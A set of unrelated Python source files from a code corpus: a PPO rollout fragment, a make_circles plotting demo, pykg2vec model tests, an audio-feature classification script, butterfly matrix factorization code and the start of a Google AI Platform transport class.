with tf.control_dependencies([scores_sum]):
scores_sum = tf.cond(
force_beginning_resets,
lambda: scores_sum + tf.reduce_sum(cumulative_rewards.read_value()),
lambda: scores_sum)
mean_score = tf.cond(
tf.greater(scores_num, 0),
lambda: scores_sum / tf.cast(scores_num, tf.float32), lambda: 0.)
printing = tf.Print(0, [mean_score, scores_sum, scores_num], "mean_score: ")
with tf.control_dependencies([index, printing]):
memory = [mem.read_value() for mem in memory]
# When generating real data together with PPO training we must use single
# agent. For PPO to work we reshape the history, as if it was generated
# by real_ppo_effective_num_agents.
if ppo_hparams.effective_num_agents is not None and not eval_phase:
new_memory = []
effective_num_agents = ppo_hparams.effective_num_agents
    assert epoch_length % ppo_hparams.effective_num_agents == 0, (
        "The rollout of ppo_hparams.epoch_length will be distributed amongst "
        "effective_num_agents of agents")
new_epoch_length = int(epoch_length / effective_num_agents)
for mem, info in zip(memory, rollout_metadata):
shape, _, name = info
new_shape = [effective_num_agents, new_epoch_length] + shape[1:]
perm = list(range(len(shape) + 1))
perm[0] = 1
perm[1] = 0
mem = tf.transpose(mem, perm=perm)
mem = tf.reshape(mem, shape=new_shape)
mem = tf.transpose(
mem,
perm=perm,
name="collect_memory_%d_%s" % (new_epoch_length, name))
new_memory.append(mem)
memory = new_memory
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
mean_score_summary = tf.cond(
tf.greater(scores_num, 0),
lambda: tf.summary.scalar("mean_score_this_iter", mean_score), str)
summaries = tf.summary.merge([
mean_score_summary,
tf.summary.scalar("episodes_finished_this_iter", scores_num)
])
return memory, summaries, initialization_lambda
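# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the original
# module). A PPOLearner is normally constructed and driven by the rl_trainer
# loop; the directories, env_fn and ppo_hparams below are placeholders, not
# real tensor2tensor symbols:
#
#   learner = PPOLearner(frame_stack_size=4,
#                        base_event_dir="/tmp/events",
#                        agent_model_dir="/tmp/agent",
#                        total_num_epochs=10)
#   learner.train(env_fn, ppo_hparams, simulated=True,
#                 save_continuously=True, epoch=0)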
|
the-stack_106_14827
|
import matplotlib.pyplot as plt
from sklearn import datasets
from mpl_toolkits.mplot3d import Axes3D
x_data, y_data = datasets.make_circles(n_samples=500, factor=.3, noise=.10)
plt.scatter(x_data[:,0], x_data[:,1], c=y_data)
plt.show()
z_data = x_data[:,0]**2 + x_data[:,1]**2
ax = plt.figure().add_subplot(111, projection = '3d')
ax.scatter(x_data[:,0], x_data[:,1], z_data, c = y_data, s = 10)  # scatter the lifted points in 3D, colored by class
# display the figure
plt.show()
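# Hedged follow-up sketch (added for illustration; not part of the original
# demo): after the quadratic lift z = x^2 + y^2 the two circles become
# (almost) linearly separable, so a plain linear classifier on (x, y, z)
# should score close to 1.0:
#
#   import numpy as np
#   from sklearn.linear_model import LogisticRegression
#   features = np.column_stack([x_data, z_data])
#   clf = LogisticRegression().fit(features, y_data)
#   print(clf.score(features, y_data))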
|
the-stack_106_14828
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This module is for testing unit functions of model
"""
import pytest
from pykg2vec.common import KGEArgParser, Importer
from pykg2vec.utils.trainer import Trainer
from pykg2vec.data.kgcontroller import KnowledgeGraph
@pytest.mark.parametrize("model_name", [
'analogy',
'complex',
'complexn3',
'conve',
'convkb',
'cp',
'distmult',
'hyper',
'hole',
'interacte',
'kg2e',
'murp',
'ntn',
'octonione',
'proje_pointwise',
'quate',
'rescal',
'rotate',
'simple',
'simple_ignr',
'slm',
'sme',
'sme_bl',
'transe',
'transh',
'transr',
'transd',
'transm',
])
def test_kge_methods(model_name):
    """Function to test a set of KGE algorithms."""
testing_function(model_name)
def test_error_on_importing_model():
with pytest.raises(ValueError) as e:
Importer().import_model_config("unknown")
assert "unknown model has not been implemented. please select from" in str(e)
@pytest.mark.skip(reason="This is a functional method.")
def testing_function(name):
"""Function to test the models with arguments."""
# getting the customized configurations from the command-line arguments.
args = KGEArgParser().get_args(['-exp', 'True'])
# Preparing data and cache the data for later usage
knowledge_graph = KnowledgeGraph(dataset=args.dataset_name)
knowledge_graph.prepare_data()
# Extracting the corresponding model config and definition from Importer().
config_def, model_def = Importer().import_model_config(name)
config = config_def(args)
config.epochs = 1
config.test_step = 1
config.test_num = 10
config.save_model = False
config.debug = True
config.ent_hidden_size = 10
config.rel_hidden_size = 10
config.channels = 2
model = model_def(**config.__dict__)
# Create, Compile and Train the model. While training, several evaluation will be performed.
trainer = Trainer(model, config)
trainer.build_model()
trainer.train_model()
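# Hedged usage note (added for illustration; not part of the original test
# module): assuming this file is saved as test_model.py, a single algorithm
# can be exercised via pytest's keyword filter, e.g. `pytest test_model.py -k transe`.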
|
the-stack_106_14830
|
import csv
import os
import librosa.display
import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler
from sklearn.tree import DecisionTreeClassifier
from sklearn.utils import shuffle
from sklearn.model_selection import KFold
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import cross_val_score
from sklearn.linear_model import Perceptron
from sklearn.svm import SVC
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.ensemble import RandomForestClassifier
def normalize_duration(full_song_name, minimum_duration):
y, sr = librosa.load(full_song_name, sr=22050, mono=True)
file_duration = librosa.get_duration(y, sr)
delta = file_duration - minimum_duration
y_new, sr = librosa.load(full_song_name, sr=22050, mono=True, offset=delta / 2, duration=minimum_duration)
return y_new, sr
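# Worked example (added for illustration): for a 30 s file and a
# minimum_duration of 20 s, delta is 10 s, so the second load starts at an
# offset of 5 s and keeps the central 20 s of the track.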
def create_train_csv():
header = 'class song_filename chroma_stft rms spectral_centroid spectral_bandwidth rolloff zero_crossing_rate'
for i in range(1, 21):
header += f' mfcc{i}'
header = header.split()
file = open(dataset_train_file, 'w', newline='')
with file:
writer = csv.writer(file)
writer.writerow(header)
def create_test_csv():
header = 'song_filename chroma_stft rms spectral_centroid spectral_bandwidth rolloff zero_crossing_rate'
for i in range(1, 21):
header += f' mfcc{i}'
header = header.split()
file = open(dataset_test_file, 'w', newline='')
with file:
writer = csv.writer(file)
writer.writerow(header)
def create_results_csvs():
header = 'Filename Predict Probability'
header = header.split()
file_names = [result_file_dtc, result_file_neigh, result_file_svc, result_file_rfc, result_file_gbc]
for file_name in file_names:
file = open(file_name, 'w', newline='')
with file:
writer = csv.writer(file)
writer.writerow(header)
def train_to_csv():
print('\nTrain split of songs:')
for class_ in classes:
for song_filename in os.listdir(path_to_root + dataset_train_folder + f'\\{class_}'):
full_song_name = path_to_root + dataset_train_folder + f'\\{class_}\\{song_filename}'
# y, sr = normalize_duration(full_song_name, minimum_duration)
y, sr = librosa.load(full_song_name, sr=22050, mono=True)
print('Class: ' + class_ + '; Song filename: ' + song_filename + '; Duration: ' + str(librosa.get_duration(y)))
chroma_stft, rms, spec_cent, spec_bw, rolloff, zcr, mfcc = create_features(y, sr)
output_train_to_csv(class_, song_filename, chroma_stft, rms, spec_cent, spec_bw, rolloff, zcr, mfcc)
print('---------------')
print('Features successful created and outputed at dataset_train.csv')
def test_to_csv():
print('\nTest split of songs:')
for song_filename in os.listdir(path_to_root + dataset_test_folder):
full_song_name = path_to_root + dataset_test_folder + f'\\{song_filename}'
# y, sr = normalize_duration(full_song_name, minimum_duration)
y, sr = librosa.load(full_song_name, sr=22050, mono=True)
print('Song filename: ' + song_filename + '; Duration: ' + str(librosa.get_duration(y)))
chroma_stft, rms, spec_cent, spec_bw, rolloff, zcr, mfcc = create_features(y, sr)
output_test_to_csv(song_filename, chroma_stft, rms, spec_cent, spec_bw, rolloff, zcr, mfcc)
print('---------------')
print('Features successful created and outputed at dataset_test.csv\n')
def create_features(y, sr):
chroma_stft = librosa.feature.chroma_stft(y=y, sr=sr)
rms = librosa.feature.rms(y=y)
spec_cent = librosa.feature.spectral_centroid(y=y, sr=sr)
spec_bw = librosa.feature.spectral_bandwidth(y=y, sr=sr)
rolloff = librosa.feature.spectral_rolloff(y=y, sr=sr)
zcr = librosa.feature.zero_crossing_rate(y)
mfcc = librosa.feature.mfcc(y=y, sr=sr)
return chroma_stft, rms, spec_cent, spec_bw, rolloff, zcr, mfcc
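# Note (added for illustration): together with output_train_to_csv() below,
# each track therefore yields 6 scalar features (chroma_stft, rms,
# spectral_centroid, spectral_bandwidth, rolloff, zero_crossing_rate) plus
# 20 MFCC means, i.e. a 26-dimensional feature vector per song.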
def output_train_to_csv(class_, song_filename, chroma_stft, rms, spec_cent, spec_bw, rolloff, zcr, mfcc):
to_append = f'{class_} {song_filename} {np.mean(chroma_stft)} {np.mean(rms)} {np.mean(spec_cent)} {np.mean(spec_bw)} {np.mean(rolloff)} {np.mean(zcr)}'
for i in mfcc:
to_append += f' {np.mean(i)}'
to_append = to_append.split()
file = open(dataset_train_file, 'a', newline='')
with file:
writer = csv.writer(file)
writer.writerow(to_append)
def output_test_to_csv(song_filename, chroma_stft, rms, spec_cent, spec_bw, rolloff, zcr, mfcc):
to_append = f'{song_filename} {np.mean(chroma_stft)} {np.mean(rms)} {np.mean(spec_cent)} {np.mean(spec_bw)} {np.mean(rolloff)} {np.mean(zcr)}'
for i in mfcc:
to_append += f' {np.mean(i)}'
to_append = to_append.split()
file = open(dataset_test_file, 'a', newline='')
with file:
writer = csv.writer(file)
writer.writerow(to_append)
def output_results_to_csvs():
results = [result_dtc, result_neigh, result_svc, result_rfc, result_gbc]
file_names = [result_file_dtc, result_file_neigh, result_file_svc, result_file_rfc, result_file_gbc]
for i in range(len(results)):
result = results[i]
result_file = file_names[i]
for i in range(len(result[0])):
to_append = f'{result[0][i]} {result[1][i]} {result[2][i]}'
to_append = to_append.split()
file = open(result_file, 'a', newline='')
with file:
writer = csv.writer(file)
writer.writerow(to_append)
def output_results_to_console():
results = [result_dtc, result_neigh, result_svc, result_rfc, result_gbc]
    model_names = {0: 'DecisionTree', 1: 'kNeighbors', 2: 'SVC', 3: 'RandomForest', 4: 'GradientBoosting'}
    for i in range(len(results)):
        result = results[i]
        print('\n Result - ' + model_names[i] + ':')
prob_counter = [0, 0, 0, 0, 0]
sum_probabilities = 0
for i in range(len(result[0])):
print('Filename: ' + str(result[0][i]) + '; Predict: ' + str(result[1][i]) + '; Probability: ' + str(
result[2][i]))
if 0.0 <= result[2][i] < 0.2:
prob_counter[0] += 1
elif 0.2 <= result[2][i] < 0.4:
prob_counter[1] += 1
elif 0.4 <= result[2][i] < 0.6:
prob_counter[2] += 1
elif 0.6 <= result[2][i] < 0.8:
prob_counter[3] += 1
elif 0.8 <= result[2][i] <= 1.0:
prob_counter[4] += 1
sum_probabilities += result[2][i]
# print('Sum of probabilities: ' + str(sum_probabilities))
print('Mean of probabilities: ' + str(sum_probabilities / len(result[0])))
print('Counters: ')
print('[0-20): ' + str(prob_counter[0]) + '; (' + str(round(prob_counter[0]/len(result[0]), 2)) + '%)')
print('[20-40): ' + str(prob_counter[1]) + '; (' + str(round(prob_counter[1]/len(result[0]), 2)) + '%)')
print('[40-60): ' + str(prob_counter[2]) + '; (' + str(round(prob_counter[2]/len(result[0]), 2)) + '%)')
print('[60-80): ' + str(prob_counter[3]) + '; (' + str(round(prob_counter[3]/len(result[0]), 2)) + '%)')
print('[80-100]: ' + str(prob_counter[4]) + '; (' + str(round(prob_counter[4]/len(result[0]), 2)) + '%)')
print('All: ' + str(len(result[0])))
def read_dataset_train_from_csv():
dataset_train = pd.read_csv(dataset_train_file)
# dataset_train = shuffle(dataset_train)
X_train = dataset_train.drop(['class', 'song_filename'], axis=1)
y_train = dataset_train['class']
return X_train, y_train
def read_dataset_test_from_csv():
dataset_test = pd.read_csv(dataset_test_file)
X_test = dataset_test.drop(['song_filename'], axis=1)
filenames_test = dataset_test['song_filename']
return X_test, filenames_test
def learn_by_DecisionTreeClassifier(X_train_scl, y_train, X_test_scl):
print('DecisionTree:')
# kf = KFold(n_splits=5, shuffle=True)
dtc = DecisionTreeClassifier()
# print('[MESSAGE]: Please, wait! Start cross-validation...')
# quality = cross_val_score(dtc, X_train_scl, y_train, cv=kf, scoring='accuracy')
# print('[MESSAGE]: Cross-validation finished successfully!')
# print('Quality: ' + str(quality))
print('[MESSAGE]: Please, wait! Start learning by DecisionTree...')
dtc.fit(X_train_scl, y_train)
print('[MESSAGE]: Learning finished successfully!')
y_test = dtc.predict(X_test_scl)
print('Predict: ' + str(y_test) + '\n')
probabilities = get_probabilities_for_predict(X_test_scl, y_test, dtc)
return y_test, probabilities
def learn_by_kNeighborsClassifier(X_train_scl, y_train, X_test_scl):
print('kNeighbors:')
# kf = KFold(n_splits=5, shuffle=True)
neigh = KNeighborsClassifier(n_neighbors=2)
# print('[MESSAGE]: Please, wait! Start cross-validation...')
# quality = cross_val_score(neigh, X_train_scl, y_train, cv=kf, scoring='accuracy')
# print('[MESSAGE]: Cross-validation finished successfully!')
# print('Quality: ' + str(quality))
print('[MESSAGE]: Please, wait! Start learning by kNeighbors...')
neigh.fit(X_train_scl, y_train)
print('[MESSAGE]: Learning finished successfully!')
y_test = neigh.predict(X_test_scl)
print('Predict: ' + str(y_test) + '\n')
probabilities = get_probabilities_for_predict(X_test_scl, y_test, neigh)
return y_test, probabilities
def learn_by_SVC(X_train_scl, y_train, X_test_scl):
print('SVC:')
# kf = KFold(n_splits=5, shuffle=True)
svc = SVC(C=10.0, probability=True)
# print('[MESSAGE]: Please, wait! Start cross-validation...')
# quality = cross_val_score(svc, X_train_scl, y_train, cv=kf, scoring='accuracy')
# print('[MESSAGE]: Cross-validation finished successfully!')
# print('Quality: ' + str(quality))
print('[MESSAGE]: Please, wait! Start learning by SVC...')
svc.fit(X_train_scl, y_train)
print('[MESSAGE]: Learning finished successfully!')
y_test = svc.predict(X_test_scl)
print('Predict: ' + str(y_test) + '\n')
probabilities = get_probabilities_for_predict(X_test_scl, y_test, svc)
return y_test, probabilities
def learn_by_RandomForestClassifier(X_train_scl, y_train, X_test_scl):
print('RandomForest:')
# kf = KFold(n_splits=5, shuffle=True)
rfc = RandomForestClassifier(n_estimators=150)
# print('[MESSAGE]: Please, wait! Start cross-validation...')
# quality = cross_val_score(rfc, X_train_scl, y_train, cv=kf, scoring='accuracy')
# print('[MESSAGE]: Cross-validation finished successfully!')
# print('Quality: ' + str(quality))
print('[MESSAGE]: Please, wait! Start learning by RandomForest...')
rfc.fit(X_train_scl, y_train)
print('[MESSAGE]: Learning finished successfully!')
y_test = rfc.predict(X_test_scl)
print('Predict: ' + str(y_test) + '\n')
probabilities = get_probabilities_for_predict(X_test_scl, y_test, rfc)
return y_test, probabilities
def learn_by_GradientBoostingClassifier(X_train_scl, y_train, X_test_scl):
print('GradientBoosting:')
# kf = KFold(n_splits=5, shuffle=True)
gbc = GradientBoostingClassifier(n_estimators=150, learning_rate=0.2)
# print('[MESSAGE]: Please, wait! Start cross-validation...')
# quality = cross_val_score(gbc, X_train_scl, y_train, cv=kf, scoring='accuracy')
# print('[MESSAGE]: Cross-validation finished successfully!')
# print('Quality: ' + str(quality))
print('[MESSAGE]: Please, wait! Start learning by GradientBoosting...')
gbc.fit(X_train_scl, y_train)
print('[MESSAGE]: Learning finished successfully!')
y_test = gbc.predict(X_test_scl)
print('Predict: ' + str(y_test) + '\n')
probabilities = get_probabilities_for_predict(X_test_scl, y_test, gbc)
return y_test, probabilities
def get_probabilities_for_predict(X_test_scl, y_test, clf):
    predict_proba = clf.predict_proba(X_test_scl)
    probabilities = []
    if isinstance(y_test[0], str):
        # Map the string class labels (folder names) back to their numeric indices.
        label_map = {'1_': 1, '2_': 2, '3_': 3, '4_': 4, '5_': 5}
        for i in range(len(y_test)):
            y_test[i] = label_map[y_test[i]]
    for i, predict in enumerate(y_test):
        probabilities.append(predict_proba[i][predict - 1])
    return probabilities
path_to_root = str(os.getcwd()) + '\\'
dataset_train_file = path_to_root + 'datasets\\' + 'dataset_train.csv'
dataset_test_file = path_to_root + 'datasets\\' + 'dataset_test.csv'
# dataset_train_file = path_to_root + 'datasets\\' + 'dataset_norm_train.csv'
# dataset_test_file = path_to_root + 'datasets\\' + 'dataset_norm_test.csv'
# dataset_train_file = path_to_root + 'datasets\\' + 'dataset1_train.csv'
# dataset_test_file = path_to_root + 'datasets\\' + 'dataset1_test.csv'
# dataset_train_file = path_to_root + 'datasets\\' + 'dataset1_norm_train.csv'
# dataset_test_file = path_to_root + 'datasets\\' + 'dataset1_norm_test.csv'
result_file_dtc = path_to_root + 'results\\' + 'result_dtc.csv'
result_file_neigh = path_to_root + 'results\\' + 'result_neigh.csv'
result_file_svc = path_to_root + 'results\\' + 'result_svc.csv'
result_file_rfc = path_to_root + 'results\\' + 'result_rfc.csv'
result_file_gbc = path_to_root + 'results\\' + 'result_gbc.csv'
# result_file_dtc = path_to_root + 'results\\' + 'result_norm_dtc.csv'
# result_file_neigh = path_to_root + 'results\\' + 'result_norm_neigh.csv'
# result_file_svc = path_to_root + 'results\\' + 'result_norm_svc.csv'
# result_file_rfc = path_to_root + 'results\\' + 'result_norm_rfc.csv'
# result_file_gbc = path_to_root + 'results\\' + 'result_norm_gbc.csv'
# result_file_dtc = path_to_root + 'results\\' + 'result1_dtc.csv'
# result_file_neigh = path_to_root + 'results\\' + 'result1_neigh.csv'
# result_file_svc = path_to_root + 'results\\' + 'result1_svc.csv'
# result_file_rfc = path_to_root + 'results\\' + 'result1_rfc.csv'
# result_file_gbc = path_to_root + 'results\\' + 'result1_gbc.csv'
# result_file_dtc = path_to_root + 'results\\' + 'result1_norm_dtc.csv'
# result_file_neigh = path_to_root + 'results\\' + 'result1_norm_neigh.csv'
# result_file_svc = path_to_root + 'results\\' + 'result1_norm_svc.csv'
# result_file_rfc = path_to_root + 'results\\' + 'result1_norm_rfc.csv'
# result_file_gbc = path_to_root + 'results\\' + 'result1_norm_gbc.csv'
classes = '1 2 3 4 5'.split()
# minimum_duration = 2.9
dataset_train_folder = 'train_data'
dataset_test_folder = 'test_data'
create_train_csv()
train_to_csv()
X_train, y_train = read_dataset_train_from_csv()
scale = StandardScaler()
X_train_scl = scale.fit_transform(X_train)
create_test_csv()
test_to_csv()
X_test, filenames_test = read_dataset_test_from_csv()
print('\nX_test:')
print(X_test)
print('------------------')
X_test_scl = scale.transform(X_test)
y_test_dtc, probabilities_dtc = learn_by_DecisionTreeClassifier(X_train_scl, y_train, X_test_scl)
y_test_neigh, probabilities_neigh = learn_by_kNeighborsClassifier(X_train_scl, y_train, X_test_scl)
y_test_svc, probabilities_svc = learn_by_SVC(X_train_scl, y_train, X_test_scl)
y_test_rfc, probabilities_rfc = learn_by_RandomForestClassifier(X_train_scl, y_train, X_test_scl)
y_test_gbc, probabilities_gbc = learn_by_GradientBoostingClassifier(X_train_scl, y_train, X_test_scl)
result_dtc = [filenames_test, y_test_dtc, probabilities_dtc]
result_neigh = [filenames_test, y_test_neigh, probabilities_neigh]
result_svc = [filenames_test, y_test_svc, probabilities_svc]
result_rfc = [filenames_test, y_test_rfc, probabilities_rfc]
result_gbc = [filenames_test, y_test_gbc, probabilities_gbc]
output_results_to_console()
create_results_csvs()
output_results_to_csvs()
|
the-stack_106_14831
|
# BSD 3-Clause License
#
# Copyright (c) 2022, ZHENG Leon
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import src.tree
from src import utils as utils
def retrieveCEC(support1, support2):
"""
    Partition the support into equivalence classes
"""
assert (support1.shape[1] == support2.shape[0])
r = support1.shape[1]
list_supp = []
cec = []
noncec = []
for i in range(r):
list_supp.append(list(support1[:, i]) + list(support2[i]))
order = sorted(range(len(list_supp)), key=list_supp.__getitem__)
index = 0
while index < r:
curr = [order[index]]
i = index + 1
while (i < r and (support1[:, order[i]] == support1[:, order[index]]).all() and (
support2[order[i]] == support2[order[index]]).all()):
curr.append(order[i])
i += 1
if min(np.sum(support1[:, order[index]]), np.sum(support2[order[index]])) <= len(curr):
cec.append(curr)
else:
noncec.append(curr)
index = i
return cec, noncec
def best_low_rank(A, rank):
"""
Finding the best low rank approximation by SVD
"""
u, s, vh = np.linalg.svd(A)
s = np.sqrt(s[:rank])
return u[:, range(rank)] @ np.diag(s), np.diag(s) @ vh[range(rank)]
def solve_DTO(support1, support2, A, type = 'complex'):
"""
Algorithm 1
:param support1: numpy array, binary matrix
:param support2: numpy array, binary matrix
:param A: numpy array
:return: X, Y numpy arrays
"""
cec, noncec = retrieveCEC(support1, support2)
if type == 'complex':
X = np.zeros(support1.shape).astype(np.complex128)
Y = np.zeros(support2.shape).astype(np.complex128)
else:
X = np.zeros(support1.shape)
Y = np.zeros(support2.shape)
for ce in cec:
rep = ce[0]
if np.sum(support1[:, rep]) == 0 or np.sum(support2[rep]) == 0:
continue
RP = np.where(support1[:, rep] == 1)[0]
CP = np.where(support2[rep] == 1)[0]
        if len(ce) == len(RP) or len(ce) == len(CP):
noncec.append(ce)
continue
submatrixA = A[RP][:, CP]
if len(ce) >= len(RP):
colx, rowx = np.meshgrid(ce, RP)
coly, rowy = np.meshgrid(CP, ce[:len(RP)])
X[rowx, colx] = np.eye(len(RP), len(ce))
Y[rowy, coly] = submatrixA
else:
colx, rowx = np.meshgrid(ce[:len(CP)], RP)
coly, rowy = np.meshgrid(CP, ce)
X[rowx, colx] = submatrixA
Y[rowy, coly] = np.eye(len(ce), len(CP))
for ce in noncec:
rep = ce[0]
RP = np.where(support1[:, rep] == 1)[0]
CP = np.where(support2[rep] == 1)[0]
submatrixA = np.array(A[RP][:, CP])
colx, rowx = np.meshgrid(ce, RP)
coly, rowy = np.meshgrid(CP, ce)
bestx, besty = best_low_rank(submatrixA, len(ce))
X[rowx, colx] = bestx
Y[rowy, coly] = besty
return X, Y
def lifting_two_layers_factorization(support1, support2, A):
"""
Lifting algorithm to factorize A into two factors with supports support1, support2, in the specific case
where support1 and support2 have disjoint rank one supports.
:param support1: numpy array, binary matrix
:param support2: numpy array, binary matrix
:param A: numpy array
:return: X, Y are the left and right factors, as numpy arrays.
"""
assert support1.shape[1] == support2.shape[0]
dtype = np.complex128 if np.iscomplex(A).any() else np.float64
X = np.zeros(support1.shape, dtype=dtype)
Y = np.zeros(support2.shape, dtype=dtype)
r = support1.shape[1]
for t in range(r):
rows = np.where(support1[:, t])[0]
cols = np.where(support2[t, :])[0]
subA = A[np.ix_(rows, cols)]
u, v = best_low_rank(subA, 1)
X[rows, t] = np.squeeze(u)
Y[t, cols] = np.squeeze(v)
return X, Y
def simple_hierarchical_factorization(support, A):
"""
Hierarchical factorization approach in Section 5.2
:param support: list of numpy arrays
:param A: numpy array
:return: list of numpy arrays
"""
result = []
matrix = A
for i in range(len(support) - 1):
support1 = support[i]
support2 = np.identity(support[i].shape[1])
for sp in support[i+1:]:
support2 = support2 @ sp
support2 = np.where(support2 > 0, 1, 0)
X, Y = solve_DTO(support1, support2, matrix)
result.append(X)
matrix = Y
result.append(matrix)
return result
def tree_hierarchical_factorization(root, A, method='lifting'):
"""
Method for hierarchical factorization described by a tree. We suppose that the sparsity constraints are the
butterfly supports.
:param root: Node object
:param A: numpy array
:param method: choice between 'lifting' or 'DTO'. Prefer 'lifting' since it is faster.
:return: list of numpy arrays, representing the sparse factors of A.
"""
assert not root.is_leaf()
if method == 'DTO':
X, Y = solve_DTO(root.left.support, root.right.support, A)
else:
assert method == 'lifting'
X, Y = lifting_two_layers_factorization(root.left.support, root.right.support, A)
left_factors = [X] if root.left.is_leaf() else tree_hierarchical_factorization(root.left, X)
right_factors = [Y] if root.right.is_leaf() else tree_hierarchical_factorization(root.right, Y)
return left_factors + right_factors
def project_BP_model_P_fixed(matrix, tree_type, p=None, max_depth=-1, return_factors=False, return_root=False):
generate_partial_tree, generate_tree = get_generation_tree_methods(tree_type)
num_factors = int(np.log2(matrix.shape[1]))
if max_depth >= 0:
root = generate_partial_tree(0, num_factors, num_factors, 0, max_depth)
else:
root = generate_tree(0, num_factors, num_factors)
if p is not None:
factors = tree_hierarchical_factorization(root, matrix @ np.transpose(p))
product = utils.product_of_factors(factors) @ p
else:
factors = tree_hierarchical_factorization(root, matrix)
product = utils.product_of_factors(factors)
if return_factors:
if return_root:
return product, factors, root
return product, factors
if return_root:
return product, root
return product
def get_generation_tree_methods(tree_type):
if tree_type == "comb":
generate_partial_tree = src.tree.generate_partial_comb_tree
generate_tree = src.tree.generate_comb_tree
elif tree_type == "inversed_comb":
generate_partial_tree = src.tree.generate_partial_inversed_comb_tree
generate_tree = src.tree.generate_inversed_comb_tree
else:
assert tree_type == "balanced"
generate_partial_tree = src.tree.generate_partial_balanced_tree
generate_tree = src.tree.generate_balanced_tree
return generate_partial_tree, generate_tree
def project_BP_model_8_perm_fixed(matrix, tree_type, max_depth=-1, return_factors=False, return_root=False):
num_factors = int(np.log2(matrix.shape[1]))
permutations = [utils.get_permutation_matrix(num_factors, perm_name)
for perm_name in ["000", "001", "010", "011", "100", "101", "110", "111"]]
# print(permutations)
projections = [project_BP_model_P_fixed(matrix, tree_type, p, max_depth, return_factors, return_root) for p in permutations]
if return_factors or return_root:
errors = [np.linalg.norm(matrix - projection[0]) / np.linalg.norm(matrix) for projection in projections]
else:
errors = [np.linalg.norm(matrix - projection) / np.linalg.norm(matrix) for projection in projections]
print(errors)
    argmin_error = np.argmin(errors)
    best = projections[argmin_error]
    if not isinstance(best, tuple):
        # Without return_factors/return_root the projection is a bare array;
        # wrap it so its rows are not unpacked into the returned tuple.
        best = (best,)
    return (*best, permutations[argmin_error])
"""
if __name__ == '__main__':
import scipy
n = 9
matrix = scipy.linalg.hadamard(2 ** n)# @ utils.bit_reversal_permutation_matrix(n).T
support = utils.support_DFT(n)
result = simple_hierarchical_factorization(support, matrix)
print(utils.error_cal(result, matrix))
"""
|
the-stack_106_14833
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import typing
import pkg_resources
from google import auth # type: ignore
from google.api_core import exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials # type: ignore
from google.cloud.aiplatform_v1beta1.types import batch_prediction_job
from google.cloud.aiplatform_v1beta1.types import (
batch_prediction_job as gca_batch_prediction_job,
)
from google.cloud.aiplatform_v1beta1.types import custom_job
from google.cloud.aiplatform_v1beta1.types import custom_job as gca_custom_job
from google.cloud.aiplatform_v1beta1.types import data_labeling_job
from google.cloud.aiplatform_v1beta1.types import (
data_labeling_job as gca_data_labeling_job,
)
from google.cloud.aiplatform_v1beta1.types import hyperparameter_tuning_job
from google.cloud.aiplatform_v1beta1.types import (
hyperparameter_tuning_job as gca_hyperparameter_tuning_job,
)
from google.cloud.aiplatform_v1beta1.types import job_service
from google.longrunning import operations_pb2 as operations # type: ignore
from google.protobuf import empty_pb2 as empty # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-aiplatform",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class JobServiceTransport(abc.ABC):
"""Abstract transport class for JobService."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/cloud-platform",)
def __init__(
self,
*,
host: str = "aiplatform.googleapis.com",
credentials: credentials.Credentials = None,
credentials_file: typing.Optional[str] = None,
scopes: typing.Optional[typing.Sequence[str]] = AUTH_SCOPES,
quota_project_id: typing.Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]): The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scope (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
